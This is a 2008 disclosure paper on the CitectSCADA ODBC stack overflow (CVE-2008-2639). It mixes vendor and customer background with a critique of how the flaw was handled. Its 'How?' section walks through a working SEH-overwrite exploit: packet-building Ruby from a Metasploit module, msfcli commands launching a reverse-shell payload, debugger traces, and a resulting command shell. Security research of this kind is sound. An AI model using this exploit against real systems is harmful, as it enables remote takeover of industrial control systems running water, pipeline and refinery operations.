The Five Ws of Citect ODBC Vulnerability CVE-2008-2639
by Kevin Finisterre (kf_lists[at]digitalmunition[dot]com)
September 6th 2008
Who?
Citect:
Citect has a long history as a global leader in the development and application of SCADA, HMI and MES solutions. The ability to develop powerful and
reliable 'industrial strength' software, capable of withstanding the rigors of large-scale operations, has been one of the companies strengths. Established
in 1973, Citect has grown to become a leading, global provider of industrial automation, real-time intelligence, and next generation manufacturing execution
systems (MES). Citect products are complemented by professional services and customer support and training and sold in numerous industries including:
Aerospace & Defense
Automotive
Building Automation
Cement & Glass
Chemical
Electronics
Food & Beverage
Machinery & Manufacturing
Metals
Mining & Minerals
Oil & Gas
Pharmaceutical
Power / Utilities & Generation
Pulp & Paper
Transportation
Water & Wastewater
Headquartered in Sydney Australia, Citect has over 20 offices and representation in Oceania, Southeast Asia, China, Japan, North and South America, Europe,
Africa and the Middle East. Citect products are distributed in more than 80 countries worldwide, through a network of more than 500 partners.
Core:
Core Security Technologies is the leader in comprehensive security testing software solutions that IT executives rely on to expose vulnerabilities,
measure operational risk, and assure security effectiveness. The companyâ CORE IMPACT product family offers a comprehensive approach to assessing the
security of network systems, endpoint systems, email users and web applications against complex threats. All CORE IMPACT security testing solutions are
backed by trusted vulnerability research and leading-edge threat expertise from the companyâ Security Consulting Services, CoreLabs and Engineering groups.
Core Security Technologies is Based in Boston, MA and Buenos Aires, Argentina
Kevin Finisterre from the Netragard sponsored DigitalMunition:
Kevin is the former Head Of Research and Co-founder of SNOSoft, Inc. aka Secure Network Operations. Kevin's primary focus has been on the
dissemination of information relating to the identification and exploitation of software vulnerabilities on various platforms. Apple, IBM, SAP, Oracle,
Symantec, and HP are among many vendors that have had problems that were identified by Kevin. Kevin is currently very active in the SCADA security scene.
He enjoys testing the limits and is constantly dedicated to thinking outside the box. His current brainchild is the project he calls DigitalMunition.com
What?
On January 30th 2008 an initial contact mail was sent by Core to Citect's support team in an effort to discuss and disclose a security vulnerability
that affected the Citect product line. Approximately 5 months later on June 11th the security advisory CORE-2008-0125 is published. This advisory outlines
an issue in the Citect ODBC service that was described as follows: "A vulnerability was found in CitectSCADA that could allow a remote un-authenticated
attacker to force an abnormal termination of the vulnerable software (Denial of Service) or to execute arbitrary code on vulnerable systems to gain complete
control of the software. To accomplish such goal the would-be attacker must be able to connect to the vulnerable service on a TCP high-port."
Core provided the following additional data. "The CitectSCADA and CitectFacilities applications include ODBC server capabilities to provide remote SQL access
to a relational database. The ODBC Server component listens on port 20222/tcp by default to service requests from clients on TCP/IP networks. The application
layer protocol used over TCP reads an initial packet of 4 bytes that specifies the length of data that follows in the next packet. A second packet of that
length with a 5-byte fixed header is then read from the same TCP socket. Once this second packet is read from the network into a buffer, the data it is then
copied to an internal buffer of fixed size allocated in the stack."
Citect made two statements publically about the bug first in the Core advisory: "CitectSCADA is not designed to be accessible on public networks and recommends
that the SCADA and control networks be protected by firewall or similar on live sites. The system must be network hardened regardless of the corrupt packet
software change to ensure a secure system given the likelihood that on the same network are open industry standard protocol devices perhaps communicating via
ethernet. Please follow this link on Citect website under 'Industries and Solutions' for security, that provides some information for customers interested in
securing their SCADA systems: http://www.citect.com/index.php?option=com_content&task=view&id=186&Itemid=322"
The second public comment was on their own website: "Citect has moved to reassure its SCADA customers they are extremely unlikely to be at risk from potential
security breaches found by Core Security Technologies in Windows-based control systems utilizing ODBC technology, so long as their systems are protected by
industry-standard security guidelines. Citect and other SCADA and Control vendors have been communicating potential vulnerabilities of control systems when
they are connected to the internet for some time. However, Citect believes this is only relevant to a company using ODBC technology and directly connecting its
system to the internet with no security in place â a situation unlikely in today's business environment. Citect's Global CEO, Christopher Crowe, says, 'The
security of our customers control systems is of paramount importance to us. Though we have not had any reports of breaches, we are contacting our customers
globally to confirm they have followed recommended network security measures. We have also developed a patch for those companies that might not be able to
implement necessary network security measures promptly."
The two sources of information available to the public are seemingly conflicting... Core on one hand has implied that this vulnerability is quite critical in
nature. Citect on the other hand is almost downplaying the issue all together. Actual users of the product must be confused to say the least. "Should I take
action? Should I be prompt about it? Is there even a reason to take action?". These questions MUST be running through the users of Citect, given the industries
Citect serves I should rephrase and perhaps say I hope these thoughts are in the minds of the users. In reality I would be willing to wager a small fortune that
most of the folks that received the Citect advisory were not inspired to take immediate action. In general no one should be more knowledgeable about a software
product than the vendor, so if the vendor pulls an Alfred E. Newman and says "What, me worry?" you can rest assured the userbase will do the same.
This paradoxical situation is exactly why you are reading this paper, I decided to clear the air and do a little research on my own. As a semi neutral 3rd party
not relying upon any of the previously made statements I could deduce my own conclusions. Those conclusions are contained within...
So what exactly is the big deal? Why is Citect software any different from any other software package with security issues? Primarily because of the
industry they serve. Citect software helps run quite a bit of critical infrastructure, power plants, factories, automation lines, and other high profile
industrial related processes.
Where?
On the Citect web page there are case studies for the following industries, Building & Facilities, Cement & Glass, Food & Beverage, Machinery & Manufacturing,
Mining & Minerals, Oil & Gas, Pharmaceutical, Waste & Wastewater. Installations range from a simple standalone Carwash heating control to an elaborate gas pipe line
system with 180 Display nodes monitoring 68,000 some odd 'tags' and 'points'. Below is a list of Citect case studies with a brief description to help familiarize you
with the wide range of industries that make use of Citect software. These names were pulled from the Citect case studies documentation that is readily available from
the Citect website:
Nelson Mandela Municipality
Large metropolitan municipality uses CitectSCADA to monitor and control sewage facilities
Brunswick County, North Carolina
A rapidly growing county ensures smooth growth using CitectSCADA
City of Shreveport, Louisiana
Louisiana city continues its tradition of leading-edge water treatment facilities by standardising on CitectSCADA
EPAL - Lisbon Water Supply
CitectSCADA's reliability significantly reduces EPAL's life-cycle costs
AstraZeneca
Batch solution facilitates compliance with FDA regulations at AstraZeneca's Plankstadt site.
Chilean Natural Gas Pipeline
Electrogas and Metrogas both choose CitectSCADA for reliable monitoring and control of their pipelines.
Slovnaft Refinery
CitectSCADA provides scalable, reliable solution to drastically reduce operationg costs at major Central European Refinery and Petrochemical company.
Debswana Diamond Mines
Citect's reliable, scalable software solutions lower life-cycle costs, increase throughput and deliver real-time information to Debswana Diamond Mines
Hanson Aggregate
Hanson digs CitectSCADA at its Wykeham Quarry
Argyle Diamond Mine
Argyle Diamond Mines produces around 32% of the world's diamond output from its fully automated, open cut Argyle mine in Western Australia's Kimberley region.
Anglo Coal
CitectSCADA delivers lower operations and maintenance costs, increased mobility of personnel and access to real-time information to Moranbah
Downtime at Olympic Dam (WMC)- Ampla - Winner of Microsoft Partner Awards
Fast ROI as Ampla Downtime enables 20% increase in capacity in rail haulage system. This project won the 2005 Microsoft Australia & NZ Partner Awards for 'Business
Productivity Solution of the Year' and 'Overall Solution of the Year'.
Impala
Ampla has allowed Implats to analyze and optimize key areas for improvement leading to: increased throughput and overall equipment efficiency; consistent quality
and reduced loss to waste streams. Information is streamlined from the plant floor to management providing a comprehensive performance management tool which has
contributed towards realizing its increased production goals
Olympic Dam Expansion
The world's largest windows-based SCADA system. The Olympic Dam site, owned by WMC Limited (Western Mining Corporation), an Australian producer and exporter of
processed minerals and metals, includes 440,000 variable tags with an average response time of 0.014 seconds. AB and Simatic PLCs interfaced to PMACS, PDL and SQL
Servers.
QAL
QAL is the 3rd largest alumina refinery in the world. Using Ampla to support the Six Sigma operational improvement methodology, significant improvements have been
made to the Raw Materials handling area - an operation with a throughput of more than 11 million metric tons per year!
Amcor Beverage Cans
Access to real-time information allows Amcor to optimize production
Ahold Coffee Company
Ahold Coffee Company implemented Ampla to improve overall equipment effectiveness (OEE) on all production lines, and as a result have seen significant results in OEE.
With a goal to decrease the amount of and duration of line stoppages without making operational or equipment changes, ACC decided an MES system was the best solution.
They also needed a solution that would easily integrate with its ERP system.
Arnott's Biscuits
Online batching system streamlines process operations at Australia's largest biscuit manufacturer - click on the image below for the full story.
Adelaide Brighton Cement
50% reduction in plant stoppages and a decrease in cost per tonne of production
Einstein III
CitectFacilities combined with BACnet and EIB provide energy and maintenance cost savings, and optimize building automation efficiency at the Einstein III office
building in Haidhausen, Munich.
London Borough
CitectFacilities has revolutionized the way a London council maintains its buildings, often alerting the council to faults before residents report the problem.
Nuremberg Exhibition Center
With CitectFacilities the Nuremberg Exhibition Center has integrated and optimized facilities systems from multiple vendors, protected existing facilities investments
and reduced building automation costs.
Roppongi Hills Mori Tower
Japan's largest redevelopment project improves tenant service, reduces operation costs and optimizes energy utilization as a result of using CitectFacilities. This is
the world's largest OPC project and includes over 300 OPC servers, 500,000 tags, and 750 graphics pages, with response times of less than 1second.
In addition to the legit customer base sites like the "ali-almukhtar" blogspot location make Citect software readily available to a number of other individuals around
the world. The illegitimate software base of Citect customers is something that perhaps can not be measured. I think the title of the "ali-almukhtar" blogspot site
speaks volumes with regard to the seemingly blatant trafficking of industrial automation related software. "Free Electrical Engineering Ebooks And Softwares - Ramadan
Kareem" trumpets out amongst various arabic Naskh style writings.
When?
This issue is happening NOW... the media has slowed down on its initial wave of both a mix of good reporting, paranoia, FUD, misquoting, misrepresentations and
has all but forgotten about the issues it raised several months ago, but this is an active problem STILL. Citect related news has shifted to things like:
"Citect receives the Asia Pacific HMI and SCADA Company of the Year"
"Schneider-Citect named as HMI leaders"
"Citect Africa 2008 user conference"
"Four megatrends in SchneiderÕs automation strategy"
"Schneider to supply worldÕs largest water recycling project"
"Schneider Electric's Initi@tive 2008 - 'Make the most of your energy'"
Lets not be so quick to forget these headlines however:
"Citect Doesn't Get 'IT' When It Comes To Application Security"
"Citect Reassures Its Customers on the Security of Their SCADA Networks"
"Top Layer TopResponse Research Team Delivers Protection against Critical CitectSCADA Buffer Overflow Vulnerability"
"Security Vulnerability Exposes Utilities to Internet Attack"
"Core Security Technologies Discovers Critical Vulnerability in SCADA Software from Citect"
"SCADA security bug exposes world's critical infrastructure"
This issue is both micro and macrocosmic with regard to SCADA security issues in general. Although people are dealing with patching this issue right now as I type, in
reality the vulnerability has existed and could have been silently exploited for over 6 years. I can confirm that Citect v5.41 was released in 2002, unfortunately I do not
have any other dates tied to earlier Citect versions. This bug could have impacted the Citect product line from day one of ODBC implementation. I am unable to trace back
to the exact implementation date due to a lack of information about older Citect versions. I have a strong suspicion that version v4 and perhaps even v3 Citect products
were also vulnerable in their day. We could be talking about a bug that has lasted the span of a decade or more, but who really knows?
So what is the real impact of the disclosure? Unfortunately we may never be able to calculate that value... we have no way of knowing for example if Russian or Chinese
military have previously weaponized exploits for this particular issue. If they theoretically DID have them, how long have they had them? How about other hackers? Perhaps
one of the fellows on in cracking community noticed the overflows when he was making a patch to allow Citect to run illegally? Who knows? We would certainly be foolish to
think that simply because Core has disclosed this issue suddenly armies of hackers are empowered to exploit this particular vulnerability. The empowerment has been there
from the initial day the bug was introduced into the codebase. Bugs are both found and exploited in silence by both malicious hackers and nation states, deny it all you
choose, however the behavior will continue to occur.
Regardless of these questions the Macrocosm is now. Regardless of the questions the Microcosm is also now. Realistically since more bugs will be found in SCADA related
software packages the future years will really shape how these 'cosms pan out.
Why?
Poor programming choices are ultimately the cause of this particular issue and subsequently many other issues as well. Poor QA is what allows these sort of issues
to slip into mainstream public products. Oddly enough I have some reservations about the development team from Citect primarily due to a white paper that I found from
their QA department. I will share and comment on a few excerpts from this document:
"Citect Group Quality Assurance Management System is based on ISO9001 and is thorough and comprehensive, assuring our customers of the highest standard in the preparation,
support and maintenance of Citect software.
The Citect Group Quality Assurance
Management System consists of:
Â¥ Quality Management Plan
Â¥ Software Tools
Â¥ Standards
Â¥ Work Practices and Checklists Configuration Management"
Up front this sounds like a pretty solid process. Of course there is more...
"Automated testing is conducted by using Microsoft Visual Test, which automates repetitive tasks, monitors system resources and provides synchronisation of tests across
networks."
Ok I am impressed now, seriously.
"Development is managed by work practices that determine phases and check points in the development process. These development phases are tracked in a master document
under the control of the project manager."
Hrmm... interesting, does security ever come into play as a phase or check point?
"C/C++ Coding standards are used to ensure that all code is documented and is uniform in format, style and error handling. Code review work practices ensure that no code
passes a checkpoint without review. The purpose of the code reviews is to remove errors and dangerous coding practices and also assist in educating developers in improving
coding techniques."
Ok this is where you lost me. How in the heck did we get to the point where we are today with the CitectSCADA product line containing various security issues IF this process
is in place and actually occurring? Here in lies the problem, many vendors push a particular image similar to the Oracle "Unbreakable" campaign when in reality lifting up the
skirt reveals a mess that no one wants to talk about. This exact posturing is why we are seeing disturbingly simple vulnerabilities in software today. Vendors are investing
more time on Marketing and damage control than they are on actually securing their codebases.
How?
This paper is really about the One H rather than the Five Ws associated with the CitectSCADA vulnerability. In the end the only thing that matters is the raw technical
detail. You can draw your own conclusions and inferences if you are properly informed. Below you will find a detailed report of my findings from a months worth of CitectSCADA
research.
As Core described it this bug is indeed "This bug is a textbook example of a classic stack-based buffer overflow". Rather than exploiting it "by overwriting the return address
of the currently running thread" I chose to go about things in a fairly standard fashion. If you are familiar with general exploitation of products that run on Windows based
operating systems overwriting the Structured Exception Handler should be in your general vocabulary.
If you have made it this far and don't quite understand:
.text:0051BC33 loc_51BC33:
.text:0051BC33 lea ecx, [ebp+pDestBuffer]
.text:0051BC39 push ecx ; stack based buffer
.text:0051BC3A mov edx, [ebp+arg_0]
.text:0051BC3D push edx ; class that contains packet
.text:0051BC3E call sub_52125A ; memcpy
it may be perhaps time to close up your email client and move on to blogging about what just happened. If you are still with me SEH exploitation is a fairly vanilla process
and in this particular case things performed as expected. General exploitation of SEH is a bit beyond the scope of this paper however I will be further describing how it
applies to this particular vulnerability.
Core very accurately described the vulnerability in their advisory with the following text:
"The ODBC Server component listens on port 20222/tcp by default to service requests from clients on TCP/IP networks. The application layer protocol used over TCP reads an
initial packet of 4 bytes that specifies the length of data that follows in the next packet. A second packet of that length with a 5-byte fixed header is then read from
the same TCP socket."
Simply loading up a packet sniffer and making a TCP connection will give you the format of the packets that you need to send. We can easily sum up the required packets in a
few lines of ruby, this is a snippet from the final metasploit module that was created for release.
# Open your eyes people... listen carefully to the rhetoric. There is no spoon.
wakeup = [0x0000000002].pack('Q')[0..4] + [mal.length].pack("N") + mal
len = [wakeup.length].pack("N")
sock.put(len)
sock.put(wakeup)
print_status("Sent malicious ODBC packet...")
Depending on the version of Citect the malicious string that triggers the issue is no more than 400 bytes of data. The crash itself can be triggered with fewer bytes but
in order to make it a properly malicious trigger something valuable needs to be overwritten. In most cases for Citect the SEH which is highly critical can be reached in
less than 400 bytes as I just mentioned. The current metasploit module has support for a number of versions on various platforms. I am going to walk through the SEH
exploitation on a Windows 2003 server machine as an example to help you understand how things operate.
$ msfcli exploit/windows/misc/citect_scada_odbc T
Id Name
-- ----
0 CiExceptionMailer.dll on XP Sp2 or SP3 5.42
1 CiExceptionMailer.dll on Server 2003 Sp2 6.0-r0
2 CiExceptionMailer.dll on XP Sp2 or SP3 6.0-r0
3 CiExceptionMailer.dll on XP Sp2 or SP3 6.10
4 CiExceptionMailer.dll on XP Sp2 or SP3 7.0-r0
5 CiExceptionMailer.dll on 2003 Server SP1 7.0-r0
6 CiExceptionMailer.dll on Win98 5.50-r0
7 CiExceptionMailer.dll on XP SP2 5.50-r0
8 CiExceptionMailer.dll on 2003 Server 5.50-r0
9 Test Crash
I have selected a target and payload and began a test run of the final module against a Windows 2003 Server machine running CitectSCADA 7.0.
$ msfcli exploit/windows/misc/citect_scada_odbc RHOST=10.211.55.8 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=10.211.55.2 TARGET=5 E
[*] Started reverse handler
[*] Trying target CiExceptionMailer.dll on 2003 Server SP1 7.0-r0...
[*] Space: 376
[*] Using Windows 2003 Target
[*] Sent malicious ODBC packet...
...
The view from inside a debugger gives loads of insight as to how exploitable this issue actually is. After sending the inital packet an exception is triggered due
to a bad memory read:
EAX 0613EA7A
ECX 00000013
EDX 00000001
EBX 00000000
ESP 07CBFBF8
EBP 07CBFC00
ESI 0613EA2D
EDI 07CC0000
EIP 7814507A MSVCR80.7814507A
7814507A F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
ECX=00000013 (decimal 19.)
DS:[ESI]=[0613EA2D]=90909090
ES:[EDI]=[07CC0000]=???
In this case the initial exception is caused because we have overwritten some chunk of data that was used in some operation from Client.dll
07CBFBF8 061C1920
07CBFBFC 07CBFC38
07CBFC00 /07CBFC24
07CBFC04 |1010C14B RETURN to Client.1010C14B from <JMP.&MSVCR80.memcpy>
07CBFC08 |07CBFE64
07CBFC0C |0613E891
07CBFC10 |000001E9
07CBFC14 |E9010000
07CBFC18 |07CBFC2C
07CBFC1C |061C1920
07CBFC20 |7813ED0F RETURN to MSVCR80.fprintf
07CBFC24 ]07CBFC3C
07CBFC28 |1010C74A RETURN to Client.1010C74A from Client.1010C122
07CBFC2C |000001E9
07CBFC30 |07CBFE64
07CBFC34 |07CBFC38
07CBFC38 |000001E9
07CBFC3C \07CBFF8C
07CBFC40 10109E7D RETURN to Client.10109E7D from Client.1010C737
07CBFC44 061C1920
07CBFC48 07CBFE64
07CBFC4C 7813E447 MSVCR80.__p__iob
07CBFC50 7813ED0F RETURN to MSVCR80.fprintf
If we take a peek at the SEH at this point we would see that it is overwritten with an attacker supplied value.
SEH chain of thread 00000888
Address SE handler
07CBFFDC CiExcept.003D59D7
As is standard the attacker supplied address points to a "POP POP RET". The full view of the Stack at the time of the SEH overwrite
shown below. We can clearly see attacker controlled data both before and after the SEH value.
07CBFFD0 90909090
07CBFFD4 90909090
07CBFFD8 90909090
07CBFFDC 909006EB Pointer to next SEH record
07CBFFE0 003D59D7 SE handler
07CBFFE4 FFFE7BE9
07CBFFE8 909090FF
07CBFFEC 90909090
07CBFFF0 90909090
07CBFFF4 90909090
07CBFFF8 90909090
07CBFFFC 90909090
The "POP POP RET" is again as expected.
003D59D7 5F POP EDI
003D59D8 5E POP ESI
003D59D9 C3 RETN
Passing the exception on will activate our handler and we can then see the real magic behind this vulnerability. The "POP POP RET" will cause
the program to "land" on the following bytes of assembly which again are standard as part of SEH based exploitation. These bytes in essence
jump over the attacker supplied SEH value and into what is considered usable shellcode space.
089CFFDC EB 06 JMP SHORT 089CFFE4
089CFFDE 90 NOP
089CFFDF 90 NOP
As we mentioned the usable shellcode space varies from version to version but in all cases it is very small. We must make use of the space before
the SEH value if we ever hope to get reliable code execution. Technically we are already "executing code" at this point but not in the traditional
sense of a remote system compromise. This is more low level simply assembly toying. Using a 5 byte near jump sufficiently places us at the beginning
of our payload buffer.
089CFFE4 ^E9 7BFEFFFF JMP 089CFE64
089CFFE9 90 NOP
089CFFEA 90 NOP
089CFFEB 90 NOP
089CFFEC 90 NOP
089CFFED 90 NOP
089CFFEE 90 NOP
089CFFEF 90 NOP
089CFFF0 90 NOP
089CFFF1 90 NOP
089CFFF2 90 NOP
089CFFF3 90 NOP
089CFFF4 90 NOP
089CFFF5 90 NOP
089CFFF6 90 NOP
089CFFF7 90 NOP
089CFFF8 90 NOP
089CFFF9 90 NOP
089CFFFA 90 NOP
089CFFFB 90 NOP
089CFFFC 90 NOP
089CFFFD 90 NOP
089CFFFE 90 NOP
089CFFFF 90 NOP
In this case I have pasted a few bytes from the beginning of the Metasploit encoded payload.
089CFE64 F5 CMC
089CFE65 B6 4F MOV DH,4F
089CFE67 24 B1 AND AL,0B1
089CFE69 4A DEC EDX
089CFE6A B8 B2403D49 MOV EAX,493D40B2
089CFE6F 32FC XOR BH,AH
089CFE71 93 XCHG EAX,EBX
089CFE72 25 969F2C14 AND EAX,142C9F96
089CFE77 7E 7F JLE SHORT 089CFEF8
089CFE79 22FD AND BH,CH
089CFE7B BF 9847463C MOV EDI,3C464798
If we let this monstrosity run unfettered and unchained from the debugger we see the following result.
$ msfcli exploit/windows/misc/citect_scada_odbc RHOST=10.211.55.8 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=10.211.55.2 TARGET=5 E
[*] Started reverse handler
[*] Trying target CiExceptionMailer.dll on 2003 Server SP1 7.0-r0...
[*] Space: 376
[*] Using Windows 2003 Target
[*] Sent malicious ODBC packet...
[*] Citect and other SCADA and Control vendors have been communicating potential vulnerabilities of control systems when they are connected to the internet for some time.
[*] However, Citect believes this is only relevant to a company using ODBC technology and directly connecting its system to the internet with no security in place -
[*] a situation unlikely in todayÕs business environment.
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.211.55.2:4444 -> 10.211.55.8:1030)
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\Citect\CitectSCADA 7\Bin>
In essence an attacker is given access to a command prompt with the privileges of the currently running Citect process. This method and technique is similar across
all versions of Windows, individual techniques had to be modified slightly to fit each target platform but successful exploitation occurred on Windows 2003 Server,
Windows XP and Windows 98 SE. In theory anything that you can install Citect on can technically be exploited.
I have attached a fully functional proof of concept code to this report in an effort to help folks truly understand the impact of this vulnerability. I personally
can not afford Core Impact and I am sure many of the folks that use this software will never be exposed to Core Impact, as such I have decided to create a public
metasploit module for this issue. The hopes are that current Citect users or people that are responsible for auditing Citect users will now have a usable tool to help
aid in the education and subsequent mitigation of this vulnerability. More importantly I hope this can serve as an example for future communications about similar such
vulnerabilities.
In my personal expertise I feel as if the statement "Citect believes this is only relevant to a company using ODBC technology and directly connecting its system to the
internet with no security in place" is completely absurd. If I were a Citect customer I would actually feel both insulted and confused by the statement. Previous
penetration testing exercises have shown that A) products are very frequently used in ways that manufactures do not intend. B) That many networks maintain a Hard
shell with a Soft chewy inside. Many companies hide behind the concept of a firewall as if it were the end all be all security solution. Currently attacking and exploiting
client side vulnerabilities is at an all time high. The old school style of directly aiming and gunning for a server has gone by the wayside. Latching on to an end user
or client machine can often be just as valuable in the over all scheme of distributed metastasis.
You would be absolutely foolish to believe that the only method or vector of exploitation for this and or any other SCADA related vulnerability was "Teh Internets". Look
at the diagrams in the Citect case studies... read the documentation from vendors that actually implement these products. Wake up... open your eyes. Don't be a sheep.
If you outlaw SCADA exploits, only outlaws will have SCADA exploits. Spread information and inform both yourself and others.
-Kevin Finisterre 2008
# milw0rm.com [2008-09-05]